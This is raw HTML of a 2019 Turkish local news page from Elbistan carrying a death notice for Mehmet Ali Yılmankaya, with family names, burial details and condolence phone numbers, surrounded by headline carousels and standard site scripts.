class="span3"><a href="http://www.elbistaninsesi.com/guncel/amerikali-muhendis-geline-elbistan-usulu-kina-toreni-h63224.html" title="Amerikalı mühendis geline Elbistan usulü kına töreni" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/06/HKN_6346.jpg" alt="Amerikalı mühendis geline Elbistan usulü kına töreni" class="pull-left" /> <div class="caption-line"><p>Amerikalı mühendis geline Elbistan usulü...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/oztunc-elbistana-hizmet-etmek-boynumun-borcudur-h63198.html" title="Öztunç: “Elbistan’a hizmet etmek boynumun borcudur”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/06/chp_bayramlaYma_1.jpg" alt="Öztunç: “Elbistan’a hizmet etmek boynumun borcudur”" class="pull-left" /> <div class="caption-line"><p>Öztunç: “Elbistan’a hizmet etmek boynumun...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/unal-elbistanin-bir-dedigi-iki-olmuyor-h63187.html" title="Ünal: “Elbistan’ın bir dediği iki olmuyor”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/06/HKN_6099.jpg" alt="Ünal: “Elbistan’ın bir dediği iki olmuyor”" class="pull-left" /> <div class="caption-line"><p>Ünal: “Elbistan’ın bir dediği iki...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/unal-ak-parti-secmeninde-kuskunluk-yok-h63155.html" title="Ünal: “AK Parti seçmeninde küskünlük yok”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/06/site_baYlYk_2.jpg" alt="Ünal: “AK Parti seçmeninde küskünlük yok”" class="pull-left" /> <div class="caption-line"><p>Ünal: “AK Parti seçmeninde küskünlük...</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Mehmet Ali Yılmankaya 79 yaşında</h1> <h2 class="lead" itemprop="description"><strong>Mehmet Ali Yılmankaya 79 yaşında</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2019-06-09 13:49:14" content="2019-06-09T13:49:14+02:00">09 Haziran 2019 Pazar 13:49</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/mehmet_ali_yilmankaya_79_yasinda_h63233_525e4.jpg" alt="Mehmet Ali Yılmankaya 79 yaşında" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/vefatlar/mehmet-ali-yilmankaya-79-yasinda-h63233.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> <div itemprop="articleBody" id="newsbody">&#160; <p class="MsoNormal" style="tab-stops:10.0cm"><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Aslen Malatya’nın Darende ilçesine bağlı Yeniköy Mahallesi’nden Elbistan’da ikamet eden merhum Ayşe Fatma Yılmankaya’nın eşi, Murat, Selahattin, merhum Ergün, Hüseyin, Nuriye, Hatın, Songül ve Fadime kardeşlerin babası, Hacı Yılmankaya’nın kardeşi, Kazım Ergin, Seyfettin Doğan, Selçuk Kara ve Mehmet Taş bacanakların kayınbabası Mehmet Ali Yılmankaya vefat etmiştir. Cenazesi, 9 Haziran 2019 Pazar günü defnedilmiştir. Kur’an-ı Kerim’i, Endüstri Meslek Lisesi arkasındaki hanesinde okunmaktadır.<o:p></o:p></span></p> <p class="MsoNormal" style="tab-stops:10.0cm"><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;"><o:p>&#160;</o:p></span></p> <p class="MsoNormal" style="tab-stops:10.0cm"><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Taziye için telefonlar:<o:p></o:p></span></p> <p class="MsoNormal" style="tab-stops:10.0cm"><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">0534 271 6786<o:p></o:p></span></p> <p class="MsoNormal" style="tab-stops:10.0cm"><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">0542 291 1906<o:p></o:p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/yan-yana-defnedildiler-h63232.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/serik-kahramanmaraslilar-derneginden-ziyaret-h63231.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/papatyam-anaokulundan-ulke-capinda-ozel-basari-h63230.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/dogandan-avcilara-avlanma-pulu-hatirlatmasi-h63229.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/rehberlik-uzmani-daldan-ogrencilere-sinav-stresi-uyarisi-h63228.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-ciftcisi-sulamada-gunesi-kesfetti-h63227.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/abdurrahim-karakoc-mezari-basinda-anildi-h63225.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/amerikali-muhendis-geline-elbistan-usulu-kina-toreni-h63224.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/15-yasindaki-bebegin-kesin-olum-sebebi-otopside-belli-olacak-h63223.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-feci-kaza-3-olu-3u-agir-4-yarali-h63222.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ters-yone-girip-bisikletliye-carptiktan-sonra-kacti-h63215.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/polisten-suruculere-seker-molasi-h63214.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tema-vakfi-dunya-cevre-gununde-hava-kirliligine-dikkati-cekti-h63213.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ramazanda-islam-cografyasina-yardim-eli-uzattilar-h63212.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistana-veteriner-fakultesi-aciliyor-h63211.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kacak-keklik-avcilari-jandarmaya-yakalandi-h63208.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-menfeze-devrildi-4-yarali-h63203.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/saadet-partililer-bayramlasti-h63201.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/mhpde-bayramlasma-programi-duzenlendi-h63200.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/iyi-partide-bayram-coskusu-h63199.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/oztunc-elbistana-hizmet-etmek-boynumun-borcudur-h63198.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bbpde-bayramin-gundemi-ekonomik-kriz-oldu-h63197.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/akintiya-kapilan-fatma-nur-un-cansiz-bedeni-bulundu-h63196.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/akintiya-kapilan-kiz-cocugu-bulunamadi-h63194.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ekinozu-polisinden-bu-yolda-hep-birlikteyiz-uygulamasi-h63189.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/yan-yana-defnedildiler-h63232.html" title="Yan yana defnedildiler"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/yan_yana_defnedildiler_h63232_dfcfe.JPG" alt="Yan yana defnedildiler" /> <div class="carousel-caption"> <h2> <span style="font-size:">Yan yana defnedildiler</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/serik-kahramanmaraslilar-derneginden-ziyaret-h63231.html" title="Serik Kahramanmaraşlılar Derneği’nden ziyaret"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/serik_kahramanmaraslilar_derneginden_ziyaret_h63231_14c24.jpg" alt="Serik Kahramanmaraşlılar Derneği’nden ziyaret" /> <div class="carousel-caption"> <h2> <span style="font-size:">Serik Kahramanmaraşlılar Derneği’nden ziyaret</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/papatyam-anaokulundan-ulke-capinda-ozel-basari-h63230.html" title="Papatyam Anaokulu’ndan ülke çapında özel başarı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/papatyam_anaokulundan_ulke_capinda_ozel_basari_h63230_18bc4.jpg" alt="Papatyam Anaokulu’ndan ülke çapında özel başarı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Papatyam Anaokulu’ndan ülke çapında özel başarı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/dogandan-avcilara-avlanma-pulu-hatirlatmasi-h63229.html" title="Doğan’dan avcılara avlanma pulu hatırlatması"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/dogandan_avcilara_avlanma_pulu_hatirlatmasi_h63229_7535c.jpg" alt="Doğan’dan avcılara avlanma pulu hatırlatması" /> <div class="carousel-caption"> <h2> <span style="font-size:">Doğan’dan avcılara avlanma pulu hatırlatması</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/rehberlik-uzmani-daldan-ogrencilere-sinav-stresi-uyarisi-h63228.html" title="Rehberlik Uzmanı Dal’dan öğrencilere sınav stresi uyarısı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/rehberlik_uzmani_daldan_ogrencilere_sinav_stresi_uyarisi_h63228_d74ab.jpg" alt="Rehberlik Uzmanı Dal’dan öğrencilere sınav stresi uyarısı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Rehberlik Uzmanı Dal’dan öğrencilere sınav stresi uyarısı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-ciftcisi-sulamada-gunesi-kesfetti-h63227.html" title="Elbistan çiftçisi, sulamada güneşi keşfetti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/elbistan_ciftcisi_sulamada_gunesi_kesfetti_h63227_70c8e.jpg" alt="Elbistan çiftçisi, sulamada güneşi keşfetti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan çiftçisi, sulamada güneşi keşfetti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/abdurrahim-karakoc-mezari-basinda-anildi-h63225.html" title="Abdurrahim Karakoç mezarı başında anıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/abdurrahim_karakoc_mezari_basinda_anildi_h63225_80e59.jpg" alt="Abdurrahim Karakoç mezarı başında anıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Abdurrahim Karakoç mezarı başında anıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/amerikali-muhendis-geline-elbistan-usulu-kina-toreni-h63224.html" title="Amerikalı mühendis geline Elbistan usulü kına töreni"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/amerikali_geline_elbistan_usulu_kina_toreni_h63224_f22d0.jpg" alt="Amerikalı mühendis geline Elbistan usulü kına töreni" /> <div class="carousel-caption"> <h2> <span style="font-size:">Amerikalı mühendis geline Elbistan usulü kına töreni</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/15-yasindaki-bebegin-kesin-olum-sebebi-otopside-belli-olacak-h63223.html" title="1,5 yaşındaki bebeğin kesin ölüm sebebi otopside belli olacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/15_yasindaki_bebegin_kesin_olum_sebebi_otopside_belli_olacak_h63223_c5dec.jpg" alt="1,5 yaşındaki bebeğin kesin ölüm sebebi otopside belli olacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">1,5 yaşındaki bebeğin kesin ölüm sebebi otopside belli olacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-feci-kaza-3-olu-3u-agir-4-yarali-h63222.html" title="Elbistan’da feci kaza: 3 ölü, 3’ü ağır 4 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/elbistanda_feci_kaza_3_olu_3u_agir_4_yarali_h63222_341ba.jpg" alt="Elbistan’da feci kaza: 3 ölü, 3’ü ağır 4 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da feci kaza: 3 ölü, 3’ü ağır 4 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ters-yone-girip-bisikletliye-carptiktan-sonra-kacti-h63215.html" title="Ters yöne girip bisikletliye çarptıktan sonra kaçtı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/ters_yone_girip_bisikletliye_carptiktan_sonra_kacti_h63215_5b43a.jpg" alt="Ters yöne girip bisikletliye çarptıktan sonra kaçtı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ters yöne girip bisikletliye çarptıktan sonra kaçtı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/polisten-suruculere-seker-molasi-h63214.html" title="Polisten sürücülere şeker molası"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/polisten_suruculere_seker_molasi_h63214_a8f7b.jpg" alt="Polisten sürücülere şeker molası" /> <div class="carousel-caption"> <h2> <span style="font-size:">Polisten sürücülere şeker molası</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tema-vakfi-dunya-cevre-gununde-hava-kirliligine-dikkati-cekti-h63213.html" title="TEMA Vakfı, Dünya Çevre Günü’nde hava kirliliğine dikkati çekti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/tema_vakfi_dunya_cevre_gununde_hava_kirliligine_dikkati_cekti_h63213_6c3a8.jpg" alt="TEMA Vakfı, Dünya Çevre Günü’nde hava kirliliğine dikkati çekti" /> <div class="carousel-caption"> <h2> <span style="font-size:">TEMA Vakfı, Dünya Çevre Günü’nde hava kirliliğine dikkati çekti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ramazanda-islam-cografyasina-yardim-eli-uzattilar-h63212.html" title="Ramazanda İslam coğrafyasına yardım eli uzattılar"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/ramazanda_islam_cografyasina_yardim_eli_uzattilar_h63212_80729.jpg" alt="Ramazanda İslam coğrafyasına yardım eli uzattılar" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ramazanda İslam coğrafyasına yardım eli uzattılar</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistana-veteriner-fakultesi-aciliyor-h63211.html" title="Elbistan’a Veteriner Fakültesi açılıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/elbistana_veteriner_fakultesi_aciliyor_h63211_a9c40.jpg" alt="Elbistan’a Veteriner Fakültesi açılıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’a Veteriner Fakültesi açılıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kacak-keklik-avcilari-jandarmaya-yakalandi-h63208.html" title="Kaçak keklik avcıları jandarmaya yakalandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/kacak_keklik_avcilari_jandarmaya_yakalandi_h63208_552ef.jpg" alt="Kaçak keklik avcıları jandarmaya yakalandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaçak keklik avcıları jandarmaya yakalandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-menfeze-devrildi-4-yarali-h63203.html" title="Otomobil menfeze devrildi: 4 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/otomobil_menfeze_devrildi_4_yarali_h63203_050f0.jpg" alt="Otomobil menfeze devrildi: 4 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil menfeze devrildi: 4 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/saadet-partililer-bayramlasti-h63201.html" title="Saadet Partililer bayramlaştı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/saadet_partililer_bayramlasti_h63201_c6fbe.jpg" alt="Saadet Partililer bayramlaştı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Saadet Partililer bayramlaştı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/mhpde-bayramlasma-programi-duzenlendi-h63200.html" title="MHP’de bayramlaşma programı düzenlendi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/mhpde_bayramlasma_programi_duzenlendi_h63200_2adbf.jpg" alt="MHP’de bayramlaşma programı düzenlendi" /> <div class="carousel-caption"> <h2> <span style="font-size:">MHP’de bayramlaşma programı düzenlendi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/iyi-partide-bayram-coskusu-h63199.html" title="İYİ Parti’de bayram coşkusu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/iyi_partide_bayram_coskusu_h63199_ddce3.jpg" alt="İYİ Parti’de bayram coşkusu" /> <div class="carousel-caption"> <h2> <span style="font-size:">İYİ Parti’de bayram coşkusu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/oztunc-elbistana-hizmet-etmek-boynumun-borcudur-h63198.html" title="Öztunç: “Elbistan’a hizmet etmek boynumun borcudur”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/oztunc_elbistana_hizmet_etmek_boynumun_borcudur_h63198_91eef.jpg" alt="Öztunç: “Elbistan’a hizmet etmek boynumun borcudur”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öztunç: “Elbistan’a hizmet etmek boynumun borcudur”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bbpde-bayramin-gundemi-ekonomik-kriz-oldu-h63197.html" title="BBP’de bayramın gündemi ekonomik kriz oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/bbpde_bayramin_gundemi_ekonomik_kriz_oldu_h63197_8d29d.jpg" alt="BBP’de bayramın gündemi ekonomik kriz oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">BBP’de bayramın gündemi ekonomik kriz oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/akintiya-kapilan-fatma-nur-un-cansiz-bedeni-bulundu-h63196.html" title="Akıntıya kapılan Fatma Nur&#039;un cansız bedeni bulundu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/akintiya_kapilan_fatma_nur_un_cansiz_bedeni_bulundu_h63196_d7660.jpg" alt="Akıntıya kapılan Fatma Nur&#039;un cansız bedeni bulundu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Akıntıya kapılan Fatma Nur&#039;un cansız bedeni bulundu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/akintiya-kapilan-kiz-cocugu-bulunamadi-h63194.html" title="Akıntıya kapılan kız çocuğu bulunamadı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/akintiya_kapilan_kiz_cocugu_bulunamadi_h63194_1abe1.jpg" alt="Akıntıya kapılan kız çocuğu bulunamadı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Akıntıya kapılan kız çocuğu bulunamadı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ekinozu-polisinden-bu-yolda-hep-birlikteyiz-uygulamasi-h63189.html" title="Ekinözü polisinden &quot;Bu Yolda Hep Birlikteyiz&quot; uygulaması"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/06/ekinozu_polisinden_bu_yolda_hep_birlikteyiz_uygulamasi_h63189_39d09.jpg" alt="Ekinözü polisinden &quot;Bu Yolda Hep Birlikteyiz&quot; uygulaması" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ekinözü polisinden &quot;Bu Yolda Hep Birlikteyiz&quot; uygulaması</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/vefatlar/mehmet-ali-yilmankaya-79-yasinda-h63233.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(63233);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="63233" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="bc80a0724107478a7dd85f9b9bae65ff6deaf29f" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/vefatlar/mehmet-ali-yilmankaya-79-yasinda-h63233.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/ergun-yilmankaya-29-yasinda-h63235.html" title="Ergün Yılmankaya 29 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/ergun_yilmankaya_29_yasinda_h63235_42be8.jpg" alt="Ergün Yılmankaya 29 yaşında" /> <span>Ergün Yılmankaya 29 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-fatma-yilmankaya-69-yasinda-h63234.html" title="Ayşe Fatma Yılmankaya 69 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/ayse_fatma_yilmankaya_69_yasinda_h63234_7b8c1.jpg" alt="Ayşe Fatma Yılmankaya 69 yaşında" /> <span>Ayşe Fatma Yılmankaya 69 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/bilal-guven-62-yasinda-h63226.html" title="Bilal Güven, 62 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/bilal_guven_62_yasinda_h63226_f1797.jpg" alt="Bilal Güven, 62 yaşında" /> <span>Bilal 